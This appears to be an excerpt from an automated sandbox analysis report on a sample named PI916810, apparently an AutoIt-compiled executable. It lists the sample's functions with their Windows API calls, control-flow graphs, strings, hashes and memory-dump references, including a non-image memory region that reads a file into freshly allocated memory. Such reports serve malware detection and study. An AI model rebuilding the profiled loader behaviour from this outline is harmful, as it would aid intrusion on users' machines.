                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00467308
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0049ECF1
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0049ED32
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0049ED70
                                                                                                                                                                            • _wcscat.LIBCMT ref: 0049EDC9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                            • API String ID: 2673923337-2727554177
                                                                                                                                                                            • Opcode ID: 40b29ba7155fbfcd2aa5db3f7af8b157bb73f115a912b57c16b626805ba73d09
                                                                                                                                                                            • Instruction ID: 79bd320e9fcffc72e579c4c7698ace422e699595d6924464de5a730418cb398c
                                                                                                                                                                            • Opcode Fuzzy Hash: 40b29ba7155fbfcd2aa5db3f7af8b157bb73f115a912b57c16b626805ba73d09
                                                                                                                                                                            • Instruction Fuzzy Hash: 41718D75008305DEC724EF26EC8196BBBE8FFA9704F40092FF445832A1EB349949DB5A
                                                                                                                                                                            Function 00463633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 760 463633-463681 762 463683-463686 760->762 763 4636e1-4636e3 760->763 765 4636e7 762->765 766 463688-46368f 762->766 763->762 764 4636e5 763->764 767 4636ca-4636d2 DefWindowProcW 764->767 768 49d31c-49d34a call 4711d0 call 4711f3 765->768 769 4636ed-4636f0 765->769 770 463695-46369a 766->770 771 46375d-463765 PostQuitMessage 766->771 772 4636d8-4636de 767->772 807 49d34f-49d356 768->807 774 463715-46373c SetTimer RegisterWindowMessageW 769->774 775 4636f2-4636f3 769->775 776 49d38f-49d3a3 call 4c2a16 770->776 777 4636a0-4636a2 770->777 773 463711-463713 771->773 773->772 774->773 781 46373e-463749 CreatePopupMenu 774->781 779 49d2bf-49d2c2 775->779 780 4636f9-46370c KillTimer call 4644cb call 463114 775->780 776->773 802 49d3a9 776->802 782 463767-463776 call 464531 777->782 783 4636a8-4636ad 777->783 787 49d2f8-49d317 MoveWindow 779->787 788 49d2c4-49d2c6 779->788 780->773 781->773 782->773 790 4636b3-4636b8 783->790 791 49d374-49d37b 783->791 787->773 796 49d2c8-49d2cb 788->796 797 49d2e7-49d2f3 SetFocus 788->797 800 4636be-4636c4 790->800 801 46374b-46375b call 4645df 790->801 791->767 799 49d381-49d38a call 4b817e 791->799 796->800 803 49d2d1-49d2e2 call 4711d0 796->803 797->773 799->767 800->767 800->807 801->773 802->767 803->773 807->767 808 49d35c-49d36f call 4644cb call 4643db 807->808 808->767
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 004636D2
                                                                                                                                                                            • KillTimer.USER32(?,00000001), ref: 004636FC
                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0046371F
                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0046372A
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 0046373E
                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0046375F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                            • String ID: TaskbarCreated$%O
                                                                                                                                                                            • API String ID: 129472671-2925486391
                                                                                                                                                                            • Opcode ID: 4acb1d505d560bab02e3a9f8ee01aa4d1539c500b95a253a5a1bf89eb90e3368
                                                                                                                                                                            • Instruction ID: 8c4176bd27aab08223f93bc62c3aea11181a9ab856c2b5fc35091fbb21911561
                                                                                                                                                                            • Opcode Fuzzy Hash: 4acb1d505d560bab02e3a9f8ee01aa4d1539c500b95a253a5a1bf89eb90e3368
                                                                                                                                                                            • Instruction Fuzzy Hash: 124119B12001C5ABDF305F68EC49B7A3B95EF15302F14013BF902963A2EA7C9D06926F
                                                                                                                                                                            Function 00463A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00463A62
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00463A71
                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00463A88
                                                                                                                                                                            • LoadIconW.USER32(000000A4), ref: 00463A9A
                                                                                                                                                                            • LoadIconW.USER32(000000A2), ref: 00463AAC
                                                                                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00463AD2
                                                                                                                                                                            • RegisterClassExW.USER32(?), ref: 00463B28
                                                                                                                                                                              • Part of subcall function 00463041: GetSysColorBrush.USER32(0000000F), ref: 00463074
                                                                                                                                                                              • Part of subcall function 00463041: RegisterClassExW.USER32(00000030), ref: 0046309E
                                                                                                                                                                              • Part of subcall function 00463041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004630AF
                                                                                                                                                                              • Part of subcall function 00463041: InitCommonControlsEx.COMCTL32(?), ref: 004630CC
                                                                                                                                                                              • Part of subcall function 00463041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004630DC
                                                                                                                                                                              • Part of subcall function 00463041: LoadIconW.USER32(000000A9), ref: 004630F2
                                                                                                                                                                              • Part of subcall function 00463041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00463101
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                                                                            • API String ID: 423443420-4155596026
                                                                                                                                                                            • Opcode ID: 73e8439e6fe8c97233bda814c019d4be9c3c19a10ca002c5361603f527582d4c
                                                                                                                                                                            • Instruction ID: dea98ce677f18b7a986c859cef40fd98676a7846589bb3099a84f0cd65bb75d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 73e8439e6fe8c97233bda814c019d4be9c3c19a10ca002c5361603f527582d4c
                                                                                                                                                                            • Instruction Fuzzy Hash: CC218D75D00344EFEB219FA4EC49B9D7BB0FB19711F00412AF500A62A1D3B95649AF89
                                                                                                                                                                            Function 00463778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$bR
                                                                                                                                                                            • API String ID: 1825951767-3489610151
                                                                                                                                                                            • Opcode ID: 027761bb90c4d79256bc2e977bb4db94ed3ded4538bd0f688152333c144d5a6f
                                                                                                                                                                            • Instruction ID: 631a700e56bf40238321bbf3ed9abdd2fd1ad6892c99d0999e91ae0751235e98
                                                                                                                                                                            • Opcode Fuzzy Hash: 027761bb90c4d79256bc2e977bb4db94ed3ded4538bd0f688152333c144d5a6f
                                                                                                                                                                            • Instruction Fuzzy Hash: AEA181719102699ACF04EFA2CC91EEEB778BF14305F10052FF412A7191EF785A09CB6A
                                                                                                                                                                            Function 0046F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004803A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004803D3
                                                                                                                                                                              • Part of subcall function 004803A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 004803DB
                                                                                                                                                                              • Part of subcall function 004803A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004803E6
                                                                                                                                                                              • Part of subcall function 004803A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004803F1
                                                                                                                                                                              • Part of subcall function 004803A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 004803F9
                                                                                                                                                                              • Part of subcall function 004803A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00480401
                                                                                                                                                                              • Part of subcall function 00476259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0046FA90), ref: 004762B4
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0046FB2D
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0046FBAA
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004A49F2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                            • String ID: <gR$\dR$%O$cR
                                                                                                                                                                            • API String ID: 1986988660-2087634799
                                                                                                                                                                            • Opcode ID: a3c74f3d1c55f23d1aeacc5509739788249b2136e0d2033a672db52c13533b40
                                                                                                                                                                            • Instruction ID: a3d5108bffa0501100433a59dc6c5af6b147bcb45f31bf2c810d7694d0e8ecf5
                                                                                                                                                                            • Opcode Fuzzy Hash: a3c74f3d1c55f23d1aeacc5509739788249b2136e0d2033a672db52c13533b40
                                                                                                                                                                            • Instruction Fuzzy Hash: 5681DDB0901290CECBA4EF2AF9906157BE4FF7A308754857ED088C7262EB35550EEF95
                                                                                                                                                                            Function 010FDC80 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 993 10fdc80-10fdd2e call 10fb6d0 996 10fdd35-10fdd5b call 10feb90 CreateFileW 993->996 999 10fdd5d 996->999 1000 10fdd62-10fdd72 996->1000 1001 10fdead-10fdeb1 999->1001 1007 10fdd79-10fdd93 VirtualAlloc 1000->1007 1008 10fdd74 1000->1008 1003 10fdef3-10fdef6 1001->1003 1004 10fdeb3-10fdeb7 1001->1004 1009 10fdef9-10fdf00 1003->1009 1005 10fdeb9-10fdebc 1004->1005 1006 10fdec3-10fdec7 1004->1006 1005->1006 1010 10fdec9-10fded3 1006->1010 1011 10fded7-10fdedb 1006->1011 1012 10fdd9a-10fddb1 ReadFile 1007->1012 1013 10fdd95 1007->1013 1008->1001 1014 10fdf55-10fdf6a 1009->1014 1015 10fdf02-10fdf0d 1009->1015 1010->1011 1018 10fdedd-10fdee7 1011->1018 1019 10fdeeb 1011->1019 1020 10fddb8-10fddf8 VirtualAlloc 1012->1020 1021 10fddb3 1012->1021 1013->1001 1016 10fdf6c-10fdf77 VirtualFree 1014->1016 1017 10fdf7a-10fdf82 1014->1017 1022 10fdf0f 1015->1022 1023 10fdf11-10fdf1d 1015->1023 1016->1017 1018->1019 1019->1003 1024 10fddff-10fde1a call 10fede0 1020->1024 1025 10fddfa 1020->1025 1021->1001 1022->1014 1026 10fdf1f-10fdf2f 1023->1026 1027 10fdf31-10fdf3d 1023->1027 1033 10fde25-10fde2f 1024->1033 1025->1001 1028 10fdf53 1026->1028 1029 10fdf3f-10fdf48 1027->1029 1030 10fdf4a-10fdf50 1027->1030 1028->1009 1029->1028 1030->1028 1034 10fde62-10fde76 call 10febf0 1033->1034 1035 10fde31-10fde60 call 10fede0 1033->1035 1041 10fde7a-10fde7e 1034->1041 1042 10fde78 1034->1042 1035->1033 1043 10fde8a-10fde8e 1041->1043 1044 10fde80-10fde84 CloseHandle 1041->1044 1042->1001 1045 10fde9e-10fdea7 1043->1045 1046 10fde90-10fde9b VirtualFree 1043->1046 1044->1043 1045->996 1045->1001 1046->1045
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010FDD51
                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010FDF77
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFileFreeVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 204039940-0
                                                                                                                                                                            • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                                                                                                                            • Instruction ID: 33ba037334078ea6e47944db3adddbd8fb152ef98825165cfc938ef8383b063e
                                                                                                                                                                            • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                                                                                                                            • Instruction Fuzzy Hash: B2A11570E00209EBDB14DFE8C895BEEBBB5FF48304F208599E245BB680D7759A41CB94
                                                                                                                                                                            Function 004639E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1114 4639e7-463a57 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00463A15
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00463A36
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00463A4A
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?), ref: 00463A53
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                            • Opcode ID: d774fa63a2684956aa1de2d6c58692a75f9da2e3fa18a2469adbc4e140fde4f9
                                                                                                                                                                            • Instruction ID: 49fabe89dfa02a3cd5ce33057578fcd04e40f17214c3d746373fa82a1f002b04
                                                                                                                                                                            • Opcode Fuzzy Hash: d774fa63a2684956aa1de2d6c58692a75f9da2e3fa18a2469adbc4e140fde4f9
                                                                                                                                                                            • Instruction Fuzzy Hash: C5F03A78600290FEEA3117236C48E372E7DDBD7F50B00413AB900A6170C2B50C4AEAB4
                                                                                                                                                                            Function 010FDA80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134fileCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1467 10fda80-10fdb7d call 10fb6d0 call 10fd970 CreateFileW 1474 10fdb7f 1467->1474 1475 10fdb84-10fdb94 1467->1475 1476 10fdc34-10fdc39 1474->1476 1478 10fdb9b-10fdbb5 VirtualAlloc 1475->1478 1479 10fdb96 1475->1479 1480 10fdbb9-10fdbd0 ReadFile 1478->1480 1481 10fdbb7 1478->1481 1479->1476 1482 10fdbd4-10fdc0e call 10fd9b0 call 10fc970 1480->1482 1483 10fdbd2 1480->1483 1481->1476 1488 10fdc2a-10fdc32 ExitProcess 1482->1488 1489 10fdc10-10fdc25 call 10fda00 1482->1489 1483->1476 1488->1476 1489->1488
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 010FD970: Sleep.KERNELBASE(000001F4), ref: 010FD981
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010FDB73
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFileSleep
                                                                                                                                                                            • String ID: X3D7XSTUJYMZSX45N0
                                                                                                                                                                            • API String ID: 2694422964-1082446581
                                                                                                                                                                            • Opcode ID: 7ae9787d4629b6e0318a93b1dfd9fdb3f8646c8857a2041a0108029d2cbb54b7
                                                                                                                                                                            • Instruction ID: 5eb3968ca9b0b64e866a83aabd6d02f9fa1a338e22ac18d43d52798513cb7230
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ae9787d4629b6e0318a93b1dfd9fdb3f8646c8857a2041a0108029d2cbb54b7
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B516131D0424DDAEF11DBE4CC19BEEBBB8AF55304F004199E658BB2C0D6B91B49CBA5
                                                                                                                                                                            Function 0048564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1491 48564d-485666 1492 485668-48566d 1491->1492 1493 485683 1491->1493 1492->1493 1495 48566f-485671 1492->1495 1494 485685-48568b 1493->1494 1496 48568c-485691 1495->1496 1497 485673-485678 call 488d68 1495->1497 1499 48569f-4856a3 1496->1499 1500 485693-48569d 1496->1500 1505 48567e call 488ff6 1497->1505 1503 4856b3-4856b5 1499->1503 1504 4856a5-4856b0 call 483020 1499->1504 1500->1499 1502 4856c3-4856d2 1500->1502 1508 4856d9 1502->1508 1509 4856d4-4856d7 1502->1509 1503->1497 1507 4856b7-4856c1 1503->1507 1504->1503 1505->1493 1507->1497 1507->1502 1510 4856de-4856e3 1508->1510 1509->1510 1513 4856e9-4856f0 1510->1513 1514 4857cc-4857cf 1510->1514 1515 485731-485733 1513->1515 1516 4856f2-4856fa 1513->1516 1514->1494 1518 48579d-48579e call 490df7 1515->1518 1519 485735-485737 1515->1519 1516->1515 1517 4856fc 1516->1517 1520 4857fa 1517->1520 1521 485702-485704 1517->1521 1530 4857a3-4857a7 1518->1530 1523 485739-485741 1519->1523 1524 48575b-485766 1519->1524 1529 4857fe-485807 1520->1529 1527 48570b-485710 1521->1527 1528 485706-485708 1521->1528 1531 485751-485755 1523->1531 1532 485743-48574f 1523->1532 1525 485768 1524->1525 1526 48576a-48576d 1524->1526 1525->1526 1534 48576f-48577b call 484916 call 4910ab 1526->1534 1535 4857d4-4857d8 1526->1535 1527->1535 1536 485716-48572f call 490f18 1527->1536 1528->1527 1529->1494 1530->1529 1537 4857a9-4857ae 1530->1537 1533 485757-485759 1531->1533 1532->1533 1533->1526 1552 485780-485785 1534->1552 1539 4857ea-4857f5 call 488d68 1535->1539 1540 4857da-4857e7 call 483020 1535->1540 1551 485792-48579b 1536->1551 1537->1535 1538 4857b0-4857c1 1537->1538 1543 4857c4-4857c6 1538->1543 1539->1505 1540->1539 1543->1513 1543->1514 1551->1543 1553 48578b-48578e 1552->1553 1554 48580c-485810 1552->1554 1553->1520 1555 485790 1553->1555 1554->1529 1555->1551
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1559183368-0
                                                                                                                                                                            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                                                                                                                                            • Instruction ID: 4bb451d7578c0cc73bf1ba3fac110d1155c9a2306c1bae792b4449d6cadff031
                                                                                                                                                                            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                                                                                                                                            • Instruction Fuzzy Hash: 7851B530A00B05DBDB24AF79C88466F77B1AF40324F64CB2FF829962D0E7789D519B49
                                                                                                                                                                            Function 004669CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00464F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00464F6F
                                                                                                                                                                            • _free.LIBCMT ref: 0049E68C
                                                                                                                                                                            • _free.LIBCMT ref: 0049E6D3
                                                                                                                                                                              • Part of subcall function 00466BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00466D0D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                                            • API String ID: 2861923089-1757145024
                                                                                                                                                                            • Opcode ID: ac3171d247a727c3f1aada62d91da4198bcd733f496c89d66fd8c94732b2b29c
                                                                                                                                                                            • Instruction ID: cbb2b1bdbc241d0bb7c350f7e38f8fb86e318ac2a14aee2966bd4980c79acdac
                                                                                                                                                                            • Opcode Fuzzy Hash: ac3171d247a727c3f1aada62d91da4198bcd733f496c89d66fd8c94732b2b29c
